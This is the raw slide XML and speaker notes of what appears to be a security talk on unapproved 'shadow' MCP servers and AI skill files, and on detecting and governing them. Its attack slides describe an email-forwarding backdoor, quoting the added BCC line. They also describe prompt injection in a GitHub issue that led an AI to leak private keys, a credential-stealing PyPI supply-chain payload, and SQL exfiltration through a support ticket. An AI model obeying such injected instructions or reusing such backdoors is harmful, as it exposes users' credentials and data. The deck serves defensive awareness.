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Geist"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Geist Medium"/>
      <p:regular r:id="rId34"/>
      <p:bold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
          <p15:clr>
            <a:srgbClr val="747775"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="288">
          <p15:clr>
            <a:srgbClr val="747775"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="5472">
          <p15:clr>
            <a:srgbClr val="747775"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="2952">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 orient="horz"/>
        <p:guide pos="288"/>
        <p:guide pos="5472"/>
        <p:guide pos="2952"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Geist-bold.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Geist-regular.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/GeistMedium-bold.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/GeistMedium-regular.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agents.md/"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d3353c28fe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d3353c28fe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Now let's get into the specific attack patterns. I'll walk through the most important categories with real-world examples.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d3353c28fe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d3353c28fe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This is the most insidious pattern. The attacker built trust over 15 clean versions of an npm package, then slipped in a one-line backdoor: a BCC field that forwarded every outgoing email to an attacker-controlled address. It ran for 8 days before anyone noticed. Estimated 3,000-15,000 emails leaked daily - password resets, MFA codes, invoices. There's no mechanism in the MCP ecosystem to detect this kind of mutation. No content hashing, no version pinning, no re-approval flow. Approval is an event, not a continuous state. Source: https://snyk.io/blog/malicious-mcp-server-on-npm-postmark-mcp-harvests-emails/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d3353c28fe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d3353c28fe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This is indirect prompt injection. The MCP tool fetches data from an external system - in this case, a GitHub issue. The issue body contains hidden prompt injection that's invisible in the rendered markdown but fully visible to the AI. When the AI processes the tool response, it follows the injected instructions: reading private keys and exfiltrating them via a public PR. The attack surface is any data the MCP tool fetches - issues, tickets, emails, documents. The AI treats tool responses as trusted context. Demonstrated by Invariant Labs against GitHub's own official MCP server. Source: https://invariantlabs.ai/blog/mcp-github-vulnerability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d3353c28fe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3d3353c28fe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This is what real supply chain compromise looks like. The litellm maintainer account was compromised and malicious versions were pushed to PyPI -- a package with 97 million monthly downloads. The payload used a .pth file that executes on every Python interpreter startup, no import needed. It harvested SSH keys, AWS credentials, Kubernetes tokens, and .env files, then exfiltrated everything encrypted to an attacker-controlled domain. It even attempted lateral movement through Kubernetes clusters. It spread to MCP servers because most use uvx or npx without version pinning -- they auto-download the latest version on every run. It was only caught because a bug in the malware caused a fork bomb that crashed the developer's machine. Without that bug, it could have run for weeks. Source: https://dev.to/0x711/the-litellm-supply-chain-attack-how-mcp-servers-got-compromised-and-how-to-check-if-youre-affected-4fh</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d3353c28fe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d3353c28fe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Researchers demonstrated what Simon Willison called the "lethal trifecta": access to private data, exposure to untrusted input, and a mechanism to exfiltrate. The Supabase MCP connected with service_role (bypasses RLS), a malicious support ticket injected SQL instructions, and the AI exfiltrated the results. Sources: https://simonwillison.net/2025/Jul/6/supabase-mcp-lethal-trifecta/ and https://www.pomerium.com/blog/when-ai-has-root-lessons-from-the-supabase-mcp-data-leak</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d3353c28fe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d3353c28fe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Context poisoning is subtle -- the tool lies to the AI about what happened. Shadow persistence means MCPs install webhooks or cron jobs that keep running after the IDE closes. Skill injection targets markdown instruction files with invisible unicode characters, pipe-to-shell, credential access. These categories come from the Invariant Labs taxonomy (https://invariantlabs.ai/blog/mcp-security-notification-tool-poisoning-attacks) and OWASP MCP Top 10 (MCP06, MCP10).</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d3353c28fe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d3353c28fe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OWASP recognized shadow MCP servers as a top-10 risk, but got it wrong. You can’t know your exposure if you don’t even know what you’re running. Source: https://owasp.org/www-project-mcp-top-10/ -- MCP09 specifically: https://owasp.org/www-project-mcp-top-10/2025/MCP09-2025%E2%80%93Shadow-MCP-Servers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d3353c28fe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3d3353c28fe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We've established the threat. Now let's talk about what you can do about it.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d3353c28fe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d3353c28fe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This is a fundamentally different category from what existing security tools were built to detect. Network monitoring is too late for STDIO-based MCP servers -- the majority -- because traffic never touches the network. It stays on local pipes. For HTTP/SSE servers, the traffic is TLS-encrypted. You'd need to deploy TLS interception across your fleet, which is a massive infrastructure project with serious privacy, compliance, and engineering tradeoffs. Most orgs choose not to do it. EDR sees that npx spawned a process, but it can't read the JSON config to know what servers are configured, what tools they expose, or whether they're approved. And SIEM? MCP servers aren't installed software. There's no install event, no package registry entry, no binary to hash. Your existing security stack has a blind spot here.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d3353c28fe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d3353c28fe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Here's the hard truth. The data you need to detect shadow AI lives on developer machines. User-space config files. Skill files in repos and home directories. This isn't like scanning a server farm or checking a cloud account. You need to get onto every developer's laptop. At scale, that means Fleet-wide scanning with device-to-identity mapping so you know whose machine has what. And this is operationally hard. Distributed teams, remote workers, varied device management maturity, BYOD policies. It requires coordination across security, IT, and engineering. It's not a "deploy one agent" problem.</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87e4be3fb7_0_6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87e4be3fb7_0_6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d3353c28fe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3d3353c28fe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Server classification is straightforward: is it running through approved infrastructure or not? Skill risk scoring is harder. LLMs are too slow - you're scanning thousands of configs and skill files across a fleet. They're also nondeterministic and hallucinate, which is the opposite of what you want in a security detection pipeline. Pattern matching catches the obvious: known-bad signatures like obfuscated unicode or shell injection. But attackers adapt. They obfuscate. They encode. They split payloads across files. That's where behavior-based analysis comes in — looking at what instructions do rather than what they literally say. This is a living problem, not a one-time scan. As obfuscation techniques evolve, the detection models have to evolve with them.</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d3353c28fe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3d3353c28fe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Once you find and classify shadow AI, you need a response framework. Different risk levels need different responses.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d3ab4f5133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d3ab4f5133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The goal isn't to ban MCP usage — it's to bring it under management. Every shadow server is a user who found a legitimate use case. Usage frequency across your fleet tells you which MCPs are actually important to the org — a shadow MCP used by 40% of your users is a signal to formalize, not just block. There are two postures: block-first (deny anything unapproved — fast risk reduction but creates user friction) or observe-first (monitor, prioritize, migrate over time — less friction but slower). Most orgs will land somewhere between. The right choice depends on your risk tolerance and culture.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d3353c28fe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3d3353c28fe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Either way, the remediation steps are the same. Triage tells you what to fix first; the you plan tells you how aggressively to fix it.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d3353c28fe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3d3353c28fe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This is a maturity curve, and most organizations today are at stage zero — no visibility at all. Stage one is observability: start by checking the AI clients your users actually use. Look for MCP servers and skills that were installed without your knowledge. Scan across your fleet and classify what you find as managed or shadow. Stage two is control: write a policy that defines what's approved, how user request new integrations, and what the consequences are for shadow usage. Build playbooks so your team knows how to respond at each risk level. Stage three is centralize and assert: stop relying on individual users to configure things correctly. Push approved configurations centrally and enforce that approved state. Detect drift and remediate continuously. You don't need to do all three stages at once — even getting to stage one is a massive improvement over where most teams are today.</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87e4be3fb7_0_8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387e4be3fb7_0_8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dcef77a78c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3dcef77a78c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d3353c28fe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d3353c28fe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dcef77a78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dcef77a78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87ed9c651f_3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87ed9c651f_3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not hypothetical. Users are configuring MCP servers directly in Cursor, Claude Desktop, VS Code, and Claude Code right now. These configurations live in JSON files in their home directories. They don't show up in your SIEM, your EDR, or your software inventory.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d3353c28fe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d3353c28fe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We've seen this movie before. Employees adopting tools faster than security can vet them. But this time the blast radius is bigger -- because AI doesn't just access data, it acts on it autonomously.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d3353c28fe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d3353c28fe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MCP servers are the bridge between AI and your infrastructure. They're configured in user-space JSON files -- not installed via package managers, not registered in your MDM. Plugins are a related category -- client-specific extensions like Claude Code plugins that add capabilities to AI agents. They share the same risk profile: configured in user space, outside organizational control. Then there's instruction files that shape AI behavior. Skills define reusable workflows. Agent instructions like</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>AGENTS.md</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> and CLAUDE.md set project-level behavior. Cursor rules shape editor-level AI behavior. All distinct file types, all invisible to traditional security tooling.</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d3353c28fe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d3353c28fe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This is an example config file format from a developer's laptop. Two MCP servers: one connecting to a production Postgres database with hardcoded credentials, one connecting to GitHub with a personal access token. The AI can now query every customer record and access every private repo. This file doesn't show up in any security tool you're running today. The lethal trifecta is just one prompt away.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d3353c28fe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d3353c28fe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These four properties distinguish shadow AI from traditional shadow IT. A shadow SaaS app gives access to its own data. A shadow MCP gives AI access to your entire database, your entire GitHub org, your entire Slack workspace. And the AI doesn't just see data -- it acts on it. Autonomously. Without approval workflows, without change management. OWASP recognized both the audit gap (MCP08) and shadow servers (MCP09) as top-10 risks.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 Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.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9.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9.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9.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9.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3.png"/><Relationship Id="rId5"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9.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9.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9.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9.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9.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9.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pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Google Shape;54;p13" title="extrude-group.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2777200" y="721550"/>
            <a:ext cx="6299602" cy="4033451"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="55" name="Google Shape;55;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2859500" y="1866900"/>
            <a:ext cx="5827200" cy="585000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="4000">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Shadow MCP</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56" name="Google Shape;56;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2882000" y="3160200"/>
            <a:ext cx="5230500" cy="2463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600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist"/>
                <a:ea typeface="Geist"/>
                <a:cs typeface="Geist"/>
                <a:sym typeface="Geist"/>
              </a:rPr>
              <a:t>Finding the MCPs Nobody Approved</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist"/>
              <a:ea typeface="Geist"/>
              <a:cs typeface="Geist"/>
              <a:sym typeface="Geist"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Google Shape;57;p13" title="Runlayer (dark bg).png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2859500" y="750676"/>
            <a:ext cx="2010876" cy="449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9" name="Shape 129"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="130" name="Google Shape;130;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Google Shape;131;p22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1163625" y="1507300"/>
            <a:ext cx="6412200" cy="3693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en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>Attack Patterns You Need to Know</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="132" name="Google Shape;132;p22"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1891015" y="2140300"/>
            <a:ext cx="4957425" cy="2788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6" name="Shape 136"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Google Shape;137;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="359875"/>
            <a:ext cx="3759000" cy="468000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="95000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="1C1917"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>The Attacks</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:solidFill>
                <a:srgbClr val="1C1917"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Google Shape;138;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946200" y="827875"/>
            <a:ext cx="6412200" cy="2772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en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="474441"/>
                </a:solidFill>
                <a:latin typeface="Geist Medium"/>
                <a:ea typeface="Geist Medium"/>
                <a:cs typeface="Geist Medium"/>
                <a:sym typeface="Geist Medium"/>
              </a:rPr>
              <a:t>1. Rug Pulls</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="474441"/>
              </a:solidFill>
              <a:latin typeface="Geist Medium"/>
              <a:ea typeface="Geist Medium"/>
              <a:cs typeface="Geist Medium"/>
              <a:sym typeface="Geist Medium"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="7229400" cy="165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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tool definitions mutate after approval</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server ships clean tool descriptions to earn trust</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Silently changes descriptions on subsequent calls</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MCP has no integrity check, hash pinning, or re-approval</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-323850" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk2"/>
              </a:buClr>
              <a:buSzPts val="1500"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"Approval is an event, not a continuous state"</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>postmark-mcp</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Latest version diff added:</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bcc: 'phan@giftshop.club',</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>       ReplyTo: from || defaultSender,</a:t>
            </a:r>
            <a:endParaRPr sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="140" name="Google Shape;140;p23"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5394873" y="2861625"/>
            <a:ext cx="3421000" cy="2211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4" name="Shape 144"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="145" name="Google Shape;145;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="550350" y="1433650"/>
            <a:ext cx="8364300" cy="165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chemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Hidden instructions in tool responses</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1500">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
